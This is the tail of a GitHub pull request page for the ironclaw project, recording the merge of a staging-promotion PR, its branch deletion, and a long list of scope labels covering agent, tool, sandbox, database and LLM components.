henrypark133 merged commit c8d824d into staging-promote/9399fccc-24203835221 Apr 10, 2026
13 checks passed
@henrypark133
henrypark133 deleted the staging-promote/e0bdd74f-24206212580 branch April 10, 2026 21:29
@github-actions github-actions Bot added scope: channel/cli TUI / CLI channel scope: channel/wasm WASM channel runtime scope: tool Tool infrastructure scope: tool/builtin Built-in tools scope: tool/wasm WASM tool sandbox scope: tool/mcp MCP client scope: tool/builder Dynamic tool builder scope: db Database trait / abstraction scope: db/postgres PostgreSQL backend scope: llm LLM integration scope: workspace Persistent memory / workspace scope: config Configuration scope: extensions Extension management scope: sandbox Docker sandbox scope: ci CI/CD workflows scope: docs Documentation scope: dependencies Dependency updates labels Apr 10, 2026
theredspoon pushed a commit to theredspoon/ironclaw that referenced this pull request Jun 21, 2026
…4206212580

chore: promote staging to staging-promote/6cbe2094-24203835221 (2026-04-09 18:19 UTC)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

contributor: core 20+ merged PRs risk: medium Business logic, config, or moderate-risk modules scope: agent Agent core (agent loop, router, scheduler) scope: channel/cli TUI / CLI channel scope: channel/wasm WASM channel runtime scope: channel/web Web gateway channel scope: ci CI/CD workflows scope: config Configuration scope: db/postgres PostgreSQL backend scope: db Database trait / abstraction scope: dependencies Dependency updates scope: docs Documentation scope: extensions Extension management scope: llm LLM integration scope: sandbox Docker sandbox scope: tool/builder Dynamic tool builder scope: tool/builtin Built-in tools scope: tool/mcp MCP client scope: tool/wasm WASM tool sandbox scope: tool Tool infrastructure scope: worker Container worker scope: workspace Persistent memory / workspace size: XL 500+ changed lines staging-promotion

Projects

None yet

Development

Successfully merging this pull request may close these issues.

8 participants